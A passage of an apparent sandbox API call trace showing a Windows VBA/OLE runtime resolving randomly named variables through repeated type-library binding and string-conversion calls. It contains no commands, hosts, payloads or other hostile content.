CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b126be, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_mQ1BQQ") returned 14 [0069.362] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mQ1BQQ", lHashVal=0x10acd9, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0) returned 0x0 [0069.362] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b806ba | out: _Dst=0x144ec0) returned 0x0 [0069.362] ITypeComp:RemoteBind (in: This=0x665ba60, szName="O1ADwAGU", lHashVal=0x107fc1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8070a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="O1ADwAGU") returned 9 [0069.363] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="O1ADwAGU", lHashVal=0x107fc1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8070a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="O1ADwAGU") returned 9 [0069.363] ITypeComp:RemoteBind (in: This=0x665bd30, szName="O1ADwAGU", lHashVal=0x107fc1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.363] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="O1ADwAGU") returned 0x107fc1 [0069.363] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="O1ADwAGU" | out: _Dst="O1ADwAGU") returned 0x0 [0069.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="O1ADwAGU") returned 9 [0069.363] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.363] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="O1ADwAGU", lHashVal=0x107fc1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.363] IUnknown:Release (This=0x665ba50) returned 0xd [0069.363] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.363] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="O1ADwAGU", lHashVal=0x107fc1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.363] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.363] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.363] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="O1ADwAGU", lHashVal=0x107fc1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.363] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.363] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.363] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="O1ADwAGU", lHashVal=0x107fc1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.363] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8070a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="O1ADwAGU") returned 9 [0069.363] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="O1ADwAGU", lHashVal=0x107fc1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.363] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.363] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8070a | out: _Dst=0x67c2d40) returned 0x0 [0069.363] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_O1ADwAGU") returned 0x10574a [0069.364] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_O1ADwAGU" | out: _Dst="_B_var_O1ADwAGU") returned 0x0 [0069.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_O1ADwAGU") returned 16 [0069.364] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.364] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_O1ADwAGU", lHashVal=0x10574a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.364] IUnknown:Release (This=0x665ba50) returned 0xd [0069.364] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.364] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_O1ADwAGU", lHashVal=0x10574a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.364] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.364] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.364] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_O1ADwAGU", lHashVal=0x10574a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.364] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.364] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.364] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_O1ADwAGU", lHashVal=0x10574a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.364] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.364] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.364] IUnknown:Release (This=0x665ba50) returned 0xd [0069.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b126ee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_O1ADwAGU") returned 16 [0069.364] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_O1ADwAGU", lHashVal=0x10574a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x77004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x77004400000000, pDummy=0x0) returned 0x0 [0069.364] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8070a | out: _Dst=0x144ec0) returned 0x0 [0069.364] ITypeComp:RemoteBind (in: This=0x665ba60, szName="V1D1UUA", lHashVal=0x1004f3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b806e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="V1D1UUA") returned 8 [0069.364] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="V1D1UUA", lHashVal=0x1004f3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b806e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="V1D1UUA") returned 8 [0069.364] ITypeComp:RemoteBind (in: This=0x665bd30, szName="V1D1UUA", lHashVal=0x1004f3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.365] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="V1D1UUA") returned 0x1004f3 [0069.365] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="V1D1UUA" | out: _Dst="V1D1UUA") returned 0x0 [0069.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="V1D1UUA") returned 8 [0069.365] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.365] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="V1D1UUA", lHashVal=0x1004f3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.365] IUnknown:Release (This=0x665ba50) returned 0xd [0069.365] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.365] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="V1D1UUA", lHashVal=0x1004f3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.365] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.365] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.365] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="V1D1UUA", lHashVal=0x1004f3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.365] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.365] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.365] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="V1D1UUA", lHashVal=0x1004f3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.365] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b806e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="V1D1UUA") returned 8 [0069.365] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="V1D1UUA", lHashVal=0x1004f3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.365] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.365] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b806e2 | out: _Dst=0x67c2d40) returned 0x0 [0069.365] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_V1D1UUA") returned 0x100877 [0069.365] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_V1D1UUA" | out: _Dst="_B_var_V1D1UUA") returned 0x0 [0069.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_V1D1UUA") returned 15 [0069.365] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.365] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_V1D1UUA", lHashVal=0x100877, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.365] IUnknown:Release (This=0x665ba50) returned 0xd [0069.365] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.366] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_V1D1UUA", lHashVal=0x100877, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.366] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.366] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.366] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_V1D1UUA", lHashVal=0x100877, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.366] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.366] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.366] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_V1D1UUA", lHashVal=0x100877, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.366] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.366] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.366] IUnknown:Release (This=0x665ba50) returned 0xd [0069.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1271e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_V1D1UUA") returned 15 [0069.366] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_V1D1UUA", lHashVal=0x100877, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x55003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x55003100000000, pDummy=0x0) returned 0x0 [0069.366] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b806e2 | out: _Dst=0x144ec0) returned 0x0 [0069.366] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ixAxAX", lHashVal=0x10a2f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8075e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ixAxAX") returned 7 [0069.366] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ixAxAX", lHashVal=0x10a2f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8075e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ixAxAX") returned 7 [0069.366] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ixAxAX", lHashVal=0x10a2f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.366] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ixAxAX") returned 0x10a2f0 [0069.367] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ixAxAX" | out: _Dst="ixAxAX") returned 0x0 [0069.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ixAxAX") returned 7 [0069.367] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.367] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ixAxAX", lHashVal=0x10a2f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.367] IUnknown:Release (This=0x665ba50) returned 0xd [0069.367] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.367] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ixAxAX", lHashVal=0x10a2f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.367] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.367] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.367] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ixAxAX", lHashVal=0x10a2f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.367] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.367] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.367] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ixAxAX", lHashVal=0x10a2f0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.367] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8075e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ixAxAX") returned 7 [0069.367] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ixAxAX", lHashVal=0x10a2f0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.367] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.367] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8075e | out: _Dst=0x67c2d40) returned 0x0 [0069.367] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ixAxAX") returned 0x101d5a [0069.367] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ixAxAX" | out: _Dst="_B_var_ixAxAX") returned 0x0 [0069.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ixAxAX") returned 14 [0069.367] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.367] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ixAxAX", lHashVal=0x101d5a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.367] IUnknown:Release (This=0x665ba50) returned 0xd [0069.367] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.368] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ixAxAX", lHashVal=0x101d5a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.368] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.368] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.368] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ixAxAX", lHashVal=0x101d5a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.368] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.368] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.368] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ixAxAX", lHashVal=0x101d5a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.368] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.368] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.368] IUnknown:Release (This=0x665ba50) returned 0xd [0069.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1274e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ixAxAX") returned 14 [0069.368] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ixAxAX", lHashVal=0x101d5a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0) returned 0x0 [0069.368] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8075e | out: _Dst=0x144ec0) returned 0x0 [0069.368] IMalloc:Realloc (This=0x7fefec05380, pv=0x6288170, cb=0x4000) returned 0xafd5e70 [0069.369] ITypeComp:RemoteBind (in: This=0x665ba60, szName="PQkBkAD", lHashVal=0x10420f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80786, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PQkBkAD") returned 8 [0069.369] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="PQkBkAD", lHashVal=0x10420f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80786, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PQkBkAD") returned 8 [0069.369] ITypeComp:RemoteBind (in: This=0x665bd30, szName="PQkBkAD", lHashVal=0x10420f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.370] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PQkBkAD") returned 0x10420f [0069.370] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="PQkBkAD" | out: _Dst="PQkBkAD") returned 0x0 [0069.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="PQkBkAD") returned 8 [0069.370] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.370] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="PQkBkAD", lHashVal=0x10420f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.370] IUnknown:Release (This=0x665ba50) returned 0xd [0069.370] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.370] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="PQkBkAD", lHashVal=0x10420f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.370] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.370] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.370] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="PQkBkAD", lHashVal=0x10420f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.370] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.370] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.370] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="PQkBkAD", lHashVal=0x10420f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.370] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80786, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PQkBkAD") returned 8 [0069.370] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="PQkBkAD", lHashVal=0x10420f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.370] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.370] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80786 | out: _Dst=0x67c2d40) returned 0x0 [0069.370] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_PQkBkAD") returned 0x104593 [0069.370] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_PQkBkAD" | out: _Dst="_B_var_PQkBkAD") returned 0x0 [0069.370] MultiByteToWideChar (in: 